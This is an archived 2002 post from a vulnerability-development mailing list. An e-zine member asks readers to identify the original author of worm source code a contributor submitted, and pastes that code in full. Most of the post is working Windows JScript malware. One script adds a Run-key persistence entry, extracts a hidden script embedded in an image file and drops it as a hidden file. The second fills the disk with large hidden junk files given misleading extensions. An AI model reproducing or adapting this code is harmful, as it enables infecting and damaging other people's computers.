Vulnerability Development mailing list archives
Stolen source?
From: "Arturo \"Buanzo\" Busleiman" <buanzo () buanzo com ar>
Date: Mon, 18 Mar 2002 01:13:29 -0300 (ART)
Hi! Do you recognize this source code? Can you tell which is the real/original author? I explain: I am a member of the Raregazz Team, we produce (!) series of underground-related articles. On the 18th edition, a non-member send us an article which was half-stolen from another author (not well known either of them). Now, he is sending us another article, a source-code explanation for a worm. This source code makes me remember of someone else's... So, I would like to find: a) the original author or at least b) know if this source is not an original (i.e is stolen) Thank you! var ob, ws, ws2, g, g2, t, yu, ly, f, f2; ob = new ActiveXObject("Scripting.FileSystemObject"); ws = WScript.CreateObject ("WScript.Shell"); n = ob.GetSpecialFolder(1)+"\\"; yu = ran(); ly = n+yu+".js"; mai(); function mai(){ ws2 = ws.RegRead("HKCU\\Control Panel\\Desktop\\MenuShowDelay"); if (ws2 != "auto"){ ws.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"+yu, l y, "REG_SZ"); ws.RegWrite("HKCU\\Control Panel\\Desktop\\MenuShowDelay", "auto", "REG_SZ"); g = ob.GetFile("girl.jpg"); f = g.OpenAsTextStream(1, -2); g2 = f.ReadAll(); g2 = g2.substring(31029, 32457); t = ob.OpenTextFile(ly, 2, true); t.Write(g2); t.Close(); f2 = ob.GetFile(ly); f2.attributes = f2.attributes + 4; } } function ran(){ rr = new Array(15); rr[0] ="$mstask"; rr[1] ="$command"; rr[2] ="$explorer"; rr[3] ="$alg"; rr[4] ="$logon"; rr[5] ="$ie"; rr[6] ="$icq"; rr[7] ="$win"; rr[8] ="$system"; rr[9] ="$sys"; rr[10] ="$scanreg"; rr[11] ="$yahoo"; rr[12] ="$msn"; rr[13] ="$clock "; rr[14] ="$logger"; rr[15] ="$yl"; var irr = rr[parseInt(Math.round(Math.random()*15))]; return (irr); } /* second source code */ var ob, f, f2, t, t2, n, w, ry0, ry1; ob = new ActiveXObject("Scripting.FileSystemObject"); t = new Date(); t2 = t.getHours()+t.getMinutes()+t.getSeconds(); n = ob.GetSpecialFolder(1)+"\\"; wrote(); function wrote(){ ry0 = ran(); ry1 = ran2(); w = n+ry0+t2+ry1; f = ob.OpenTextFile(w, 2, true); for (q = 0; q < 1000; q++){rew();} f.Close(); f2 = ob.GetFile(w); f2.attributes = f2.attributes + 4; } function ran(){ rr = new Array(15); rr[0] ="mstask."; rr[1] ="command."; rr[2] ="explorer."; rr[3] ="alg."; rr[4] = "logon."; rr[5] ="ie."; rr[6] ="leeme."; rr[7] ="win."; rr[8] ="system."; rr[9] ="sys."; rr[10] ="scanreg."; rr[11] ="icq."; rr[12] ="msn."; rr[13] ="clock."; rr[14] ="logger."; rr[15] ="yl."; var irr = rr[parseInt(Math.round(Math.random()*15))]; return (irr); } function ran2(){ rr2 = new Array(15); rr2[0] =".exe"; rr2[1] =".doc"; rr2[2] =".com"; rr2[3] =".bat"; rr2[4] =".tmp"; rr2[5] =".xls"; rr2[6] =".ini"; rr2[7] =".inf"; rr2[8] =".vxd"; rr2[9] =".dll" ; rr2[10] =".htm"; rr2[11] =".cpl"; rr2[12] =".sys"; rr2[13] =".dat"; rr2[14] = ".yl"; rr2[15] =".hex"; var irr2 = rr2[parseInt(Math.round(Math.random()*15))]; return (irr2); } function rew(){ f.Write(":::: GusanoDisk Y v5.recover ::::"); f.Write("Creado :: "+ t2); f.WriteBlankLines(90); for (q = 0; q < 900; q++){f.Write("GusanoDisk Y by HeX. Gracias por sus megabytes."); } }
Current thread:
- Stolen source? Arturo "Buanzo" Busleiman (Mar 17)
- <Possible follow-ups>
- RE: Stolen source? Cushing, David (Mar 18)